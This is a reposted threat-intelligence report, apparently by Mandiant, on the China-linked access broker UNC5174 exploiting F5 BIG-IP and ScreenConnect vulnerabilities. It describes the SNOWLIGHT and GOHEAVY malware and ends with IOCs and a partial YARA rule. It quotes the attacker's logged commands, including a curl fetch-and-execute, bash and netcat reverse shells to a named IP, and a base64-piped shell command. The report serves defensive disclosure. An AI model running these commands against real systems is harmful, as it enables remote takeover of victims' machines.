<p>logsapimanagement[.]azurewebsites[.]net</p>
</li>
<li>
<p>logsapimanagements[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>logupdatemanagementapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>manpowerfeedapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>marineblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktextcheckings[.]azurewebsites[.]net</p>
</li>
<li>
<p>notebooktexts[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestionsapicheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>onequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>openapplicationcheck[.]azurewebsites[.]net</p>
</li>
<li>
<p>optionalapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalitytestquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>personalizationsurvey[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>qaquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryfindquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>queryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsapplicationbackup[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsdatabases[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyapp[.]azurewebsites[.]net</p>
</li>
<li>
<p>questionsurveyappserver[.]azurewebsites[.]net</p>
</li>
<li>
<p>quiztestapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>refaeldevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>regionuaequestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>registerinsurance[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselectorapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>roadmapselector[.]azurewebsites[.]net</p>
</li>
<li>
<p>sportblogs[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyappquery[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>surveyonlinetest[.]azurewebsites[.]net</p>
</li>
<li>
<p>technewsblogapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapi1[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapis[.]azurewebsites[.]net</p>
</li>
<li>
<p>testmanagementapisjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>testquestionapplicationapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>testtesttes[.]azurewebsites[.]net</p>
</li>
<li>
<p>tiappschecktest[.]azurewebsites[.]net</p>
</li>
<li>
<p>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>turkairline[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeaircheckon[.]azurewebsites[.]net</p>
</li>
<li>
<p>uaeairchecks[.]azurewebsites[.]net</p>
</li>
<li>
<p>vscodeupdater[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>workersquestionsjson[.]azurewebsites[.]net</p>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect]]></title>
<description><![CDATA[Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen

 
During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Addit...]]></description>
<link>https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a> affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.</p>
<p>Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting <a href="https://cloud.google.com/blog/topics/threat-intelligence/connectwise-screenconnect-hardening-remediation" rel="noopener" target="_blank"><u>ConnectWise ScreenConnect vulnerability</u></a> (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" rel="noopener" target="_blank"><u>CVE-2024-1709</u></a>) to compromise hundreds of institutions primarily in the U.S. and Canada.</p>
<h2>Targeting and Timeline</h2>
<p>UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.</p>
<p>The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.</p>
<ul>
<li>ConnectWise ScreenConnect Vulnerability CVE-2024-1709</li>
<li>F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747</li>
<li>Atlassian Confluence CVE-2023-22518</li>
<li>Linux Kernel Exploit CVE-2022-0185</li>
<li>Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525</li>
</ul>
<p>Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig1.max-1000x1000.jpg" alt="UNC5174 global targeting map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8pnka">Figure 1: UNC5174 global targeting map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Initial Disclosure of CVE-2023-46747</h2>
<p>On Oct. 25, 2023, Praetorian published an <a href="https://www.praetorian.com/blog/advisory-f5-big-ip-rce/" rel="noopener" target="_blank"><u>advisory</u></a> and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a>) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The <a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>advisory</u></a> detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.</p>
<h2>Evidence of Exploitation</h2>
<p>Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "<em><strong>/var/log/audit</strong></em>" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:</p>
<ul>
<li><em><strong>/etc/passwd</strong></em></li>
<li><em><strong>/etc/shadow</strong></em></li>
<li>The creation of the user's home directory was also replicated at <em><strong>/home/&lt;username&gt;</strong></em>.</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 
01420002:5: AUDIT - pid=30629 user=root folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=create 
auth user f5support3 password **** shell bash partition-access 
add { all-partitions { role admin } }

Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash -c id</code></pre>
<p><span>Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.</span></p></div>
<div class="block-paragraph_advanced"><p>The "<em><strong>/var/log/restjavad-audit.log</strong></em>" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "<em><strong>f5support3</strong></em>". The following log entries show the <em><strong>f5support3</strong></em> user executing bash commands. The body of the POST request contains the bash command being executed.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"POST","uri":"http://localhost:8100
/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}

[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100
/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}
</code></pre>
<p><span>Table 2: UNC5174 bash commands with newly created username f5support3</span></p></div>
<div class="block-paragraph_advanced"><p>UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:</p>
<ul>
<li>F5support3</li>
<li>F5_admin</li>
<li>f5_support</li>
</ul>
<h2>Post-Exploitation Tactics by UNC5174 After Successful Account Creation</h2>
<h3>SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL</h3>
<p>UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named <u>SNOWLIGHT</u>.</p>
<p>The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: </p>
<ol>
<li>Delete any file previously written to /tmp/watchsys.</li>
<li>Forcefully kill the process "watchsys" if it is running.</li>
<li>Download the file from a remote URL to /tmp/watchsys.</li>
<li>Modify the permissions of /tmp/watchsys to allow execution.</li>
<li>Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated.</li>
<li>Perform a directory listing of the /tmp directory.</li>
</ol></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: 
01420002:5: AUDIT - pid=17602 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys 
http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup 
/tmp/watchsys &amp;;ls -al /tmp/"</code></pre>
<p><span>Table 3: UNC5174 cURL command to download SNOWLIGHT downloader</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig2.max-1000x1000.png" alt="Excerpt showing SNOWLIGHT's decoding routine and memory injection method">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kdtvq">Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&amp;C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99".</p>
<p>Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process.</p>
<p>The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:</p>
<ul>
<li>Process Name: memfd:a (deleted)</li>
<li>Path: empty (due to the executable being un-backed)</li>
<li>Args: ?</li>
<li>User: root</li>
</ul>
<p>GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. </p>
<p>Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=
/Common module=(tmos)# status=[Command OK] cmd_data=run util 
bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0&gt;&amp;1 &amp;"|</code></pre>
<p><span>Table 4: UNC5174 command to download a bash web shell</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "nc 172.104.124[.]74 443 -e /bin/bash &amp;"</code></pre>
<p><span>Table 5: UNC5174 command to download a netcat web shell</span></p></div>
<div class="block-paragraph_advanced"><h3>Internal Reconnaissance</h3>
<p>Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx</code></pre>
<pre class="language-plain"><code>curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases
/download/v1.2.5/App-amd64linux-noupx</code></pre>
<p><span>Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality</span></p></div>
<div class="block-paragraph_advanced"><p>The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool <a href="https://github.com/shadow1ng/fscan" rel="noopener" target="_blank">FSCAN</a>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>./ss -i &lt;Internal CIDR block&gt;</code></pre>
<p><span>Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances</span></p></div>
<div class="block-paragraph_advanced"><h3>GOHEAVY Tunneler: A Closer Look</h3>
<p>UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces.</p>
<p>This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network</p>
<p>In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:</p>
<ul>
<li>SLIVER client</li>
<li>FFUFP</li>
<li>SQLMAP</li>
<li>DIRBUSTER</li>
<li>METASPLOIT</li>
<li>AFROG penetration testing tool</li>
<li>NUCLEI vulnerability scanning templates</li>
</ul>
<h3>UNC5174 Closes the Door Behind Them</h3>
<p>Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "<a href="http://mitigation.sh/" rel="noopener" target="_blank"><u>mitigation.sh</u></a>". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:</p>
<ul>
<li>bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73</li>
<li>28/10 14:16:23 deleted user root6</li>
<li>28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u</li>
<li>4/11/2023 03:36:30 /tmp/.del</li>
</ul>
<h2>UNC5174 Targets ScreenConnect Vulnerability</h2>
<p>On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. </p>
<p>Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig3.max-1000x1000.png" alt="Geographic distribution of UNC5174 ScreenConnect targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Attribution</h2>
<p>Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.</p>
<h3>Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors</h3>
<p>Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.</p>
<p>As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously <a href="https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion" rel="noopener" target="_blank"><u>indicted</u></a> by the U.S. Department of Justice in 2020. </p>
<p>On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a <a href="https://github.com/Chocapikk/CVE-2023-22515" rel="noopener" target="_blank"><u>public proof of concept</u></a> to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig4.max-1000x1000.png" alt="Telegram channel for Xiaoqiying claiming no employment with the Chinese government">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.</p>
<h2>Outlook and Implications</h2>
<p>UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.</p>
<h2>Remediation and Hardening</h2>
<p>Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:</p>
<ul>
<li>Restrict access to the F5 TMUI from the internet.</li>
<li>Immediately apply the F5 mitigation script published in [<a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>K000137353</u></a>] to any vulnerable F5 appliances.</li>
<li>Investigate vulnerable F5 appliances for evidence of compromise.</li>
</ul>
<p>In the event of F5 compromise:</p>
<ul>
<li>Review appliance configurations for unauthorized modifications.</li>
<li>Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.</li>
<li>Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.</li>
</ul>
<p>For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller <a href="https://services.google.com/fh/files/misc/connectwise-screenconnect-remediation-hardening-guide.pdf" rel="noopener" target="_blank"><u>read our latest ScreenConnect remediation and hardening guide</u></a>.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Network IOCs</h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IP Address</strong></p>
</td>
<td>
<p><strong>ASN</strong></p>
</td>
<td>
<p><strong>NetBlock</strong></p>
</td>
<td>
<p><strong>Location</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>118.140.151[.]242 </span></p>
</td>
<td>
<p><span>9304</span></p>
</td>
<td>
<p><span>HGC Global Communications Limited</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>61.239.68[.]73 </span></p>
</td>
<td>
<p><span>9269</span></p>
</td>
<td>
<p><span>Hong Kong Broadband Network Ltd.</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>172.245.68[.]110</span></p>
</td>
<td>
<p><span>36352</span><a href="https://www.virustotal.com/gui/search/entity%253Aip%2520as_owner%253AAS-COLOCROSSING" rel="noopener" target="_blank"><span> </span></a></p>
</td>
<td>
<p><span>Colocrossing</span></p>
</td>
<td>
<p><span>(U.S.)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>URLs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>URL</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>http://172.245.68[.]110:8888 </span></p>
</td>
<td>
<p><span>SUPERSHELL C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host IOCs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>MD5 Hash</span></strong></p>
</td>
<td>
<p><strong><span>Filename</span></strong></p>
</td>
<td>
<p><strong><span>Type</span></strong></p>
</td>
<td>
<p><strong><span>Code Family</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>c867881c56698f938b4e8edafe76a09b</span></p>
</td>
<td>
<p><span>LG</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>df4603548b10211f0aa77d0e9a172438</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0951109dd1be0d84a33d52c135ba9c97</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c3bf506dd19c08c0ed3af9c1708a770</span></p>
</td>
<td>
<p><span>memfd:a</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0ba435460fb7622344eec28063274b8a</span></p>
</td>
<td>
<p><span>undefined</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>a78bf3d16349eba86719539ee8ef562d</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host Based Indicators (Commands)</h3>
<pre class="language-plain"><code>cmd_data=run util bash -c "echo 
dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= 
| base64 -d | sh"  "tmsh -q -c 'cd /;show running-config recursive'"
run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0&gt;&amp;1 &amp;"</code></pre></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<pre class="language-plain"><code>rule M_Backdoor_GOREVERSE_2
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect events related 
to goreverse. GOREVERSE is a publicly available reverse shell"
                md5 = "5c175ea3664279d6c0c2609844de6949"
                platforms = "Windows,Linux,MacOS"
                malware_family = "GOREVERSE"
        strings:
                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B 
[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 
8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
                $cc_rssh = "rssh" fullword
